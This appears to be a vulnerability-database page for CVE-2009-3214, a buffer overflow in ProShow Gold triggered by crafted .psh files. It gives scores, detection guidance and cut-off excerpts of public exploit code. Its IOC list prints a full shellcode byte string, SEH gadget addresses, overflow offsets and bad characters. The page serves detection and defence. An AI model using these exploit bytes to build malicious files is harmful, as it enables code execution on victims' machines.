CVE-2009-3214
published 2009-09-16CVE-2009-3214: Multiple stack-based buffer overflows in Photodex ProShow Gold 4.0.2549 allow remote attackers to execute arbitrary code via a crafted Slideshow project (.psh)…
PriorityP356critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
30.79%
98.0th percentile
Multiple stack-based buffer overflows in Photodex ProShow Gold 4.0.2549 allow remote attackers to execute arbitrary code via a crafted Slideshow project (.psh) file, related to the (1) cell[n].images[m].image and (2) cell[n].sound.file fields.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| photodex | proshow_gold | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg↗
bytes↗
\xeb\x18\x90\x90
bytes↗
\x01\xa6\x14\xea
bytes↗
\xEB\x06\x90\x90
bytes↗
\xf9\x4c\x1a\x10
bytes↗
0x101a4cf9
bytes↗
\xda\xd1\xd9\x74\x24\xf4\x2b\xc9\xb1\x1e\xbd\x78\x41\xbf\x6f\x58\x83\xe8\xfc\x31\x68\x14\x03\x68\x6c\xa3\x4a\x93\x64\x67\xb5\x6c\x74\xe3\xf0\x50\xff\x8f\xff\xd0\xfe\x80\x8b\x6e\x18\xd4\xd3\x50\x19\x01\xa2\x1b\x2d\x5e\x34\xf2\x7c\xa0\xae\xa6\xfa\xe0\xa5\xb1\xc3\x2b\x48\xbf\x01\x40\xa7\x84\xd1\xb3\x4c\x8e\x3c\x30\x13\x54\xbf\xac\xca\x1f\xb3\x79\x98\x7f\xd7\x7c\x75\xf4\xfb\xf5\x88\xe0\x8a\x56\xaf\xf2\x4f\x39\x9e\x0c\x2f\x90\x84\x7b\xe9\x2c\xce\x3c\xf9\xc7\xa0\xa0\xac\x53\x28\xd1\x27\x9b\x2a\x21\x5d\x0c\x45\x52\x2b\xa8\xca\xfa\xb3\x4f\x7e\xf4\x94\x50\x98\x6a\x7b\xc3\x04\x6d
- →Malicious .psh files exploit the cell[n].images[m].image field with an oversized value (6120–6151 'A' bytes) to trigger a stack-based buffer overflow via SEH overwrite in ProShow Gold 4.0.2549 ↗
- →Detect .psh files where the cell[0].images[0].image field value length exceeds normal path lengths (e.g., >4000 bytes), indicating a buffer overflow attempt ↗
- →The SEH overwrite exploit uses p/p/r gadget at 0x01a614ea (all.dnt) or 0x101a4cf9 (if.dnt) in ProShow Gold 4.0.2549; look for these return addresses on the stack during crash analysis ↗
- →Bad characters for payload encoding in this exploit are null byte, newline, and carriage return (\x00\x0a\x0d); payloads in .psh files will not contain these bytes ↗
- →The exploit file header magic string 'Photodex(R) ProShow(TM) Show File Version=0' combined with an abnormally long cell[0].images[0].image value is a strong indicator of a weaponized .psh file ↗
- ·The SEH overwrite offset differs between exploit variants: 6120 bytes of junk in the corelanc0d3r PoC vs. 6151 bytes in the hack4love variant, and 4036 bytes in the Metasploit module; the Metasploit module targets a different p/p/r gadget (0x101a4cf9 in if.dnt) vs. the standalone PoCs (0x01a614ea in all.dnt) ↗
- ·The Metasploit module uses EXITFUNC=process and DisablePayloadHandler=true by default, and requires the victim to manually open the crafted .psh file (no network vector) ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ProShow Gold 4.0.2549 - '.psh' Local Stack Buffer Overflow (Metasploit)
exploitdb·2010-09-25
CVE-2009-3214 ProShow Gold 4.0.2549 - '.psh' Local Stack Buffer Overflow (Metasploit)
ProShow Gold 4.0.2549 - '.psh' Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: proshow_cellimage_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.
An attacker must send the file to victim and the victim must open the file.
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-
Exploit-DB
ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)
exploitdb·2009-08-25
CVE-2009-3214 ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)
ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH
##########################################################################
##http://files.photodex.com/release/psgold_40_2549.exe
##http://files.photodex.com/release/pspro_40_2549.exe
###########################################################################
##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################
###########################################################################
##FIRST WAS BY corelanc0d3r################################################
###########################################################################
my $header="Photodex(R) Pr
Exploit-DB
Photodex ProShow Gold 4 (Windows XP SP3) - '.psh' Universal Buffer Overflow (SEH)
exploitdb·2009-08-24
CVE-2009-3214 Photodex ProShow Gold 4 (Windows XP SP3) - '.psh' Universal Buffer Overflow (SEH)
Photodex ProShow Gold 4 (Windows XP SP3) - '.psh' Universal Buffer Overflow (SEH)
---
#
# [+] Vulnerability : ProShow Gold 4 BOF
# [+] Detected by : Bkis - http://blog.bkis.com/?p=737
# [*] Sploit coded by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit coded on : August 20, 2009
# [*] Type : local
# [*] OS : Windows
# [*] Product : Photodex ProShow Gold
# [*] Versions affected : 4.0
# [*] Download link : http://www.photodex.com/downloads/go_proshowgold
# [*] -------------------------------------------------------------------------
# [*] Method : SEH - Universal
# [*] Tested on : Windows XP SP3 En
# [*] Greetz&Tx to : Saumil/SK
# [*] -------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?.
Metasploit
ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
metasploit
ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549. An attacker must send the file to victim and the victim must open the file.
No writeups or analysis indexed.
http://blog.bkis.com/?p=737http://osvdb.org/57226http://secunia.com/advisories/36357http://www.securityfocus.com/archive/1/505957/100/0/threadedhttps://exchange.xforce.ibmcloud.com/vulnerabilities/52606http://blog.bkis.com/?p=737http://osvdb.org/57226http://secunia.com/advisories/36357http://www.securityfocus.com/archive/1/505957/100/0/threadedhttps://exchange.xforce.ibmcloud.com/vulnerabilities/52606
2009-09-16
Published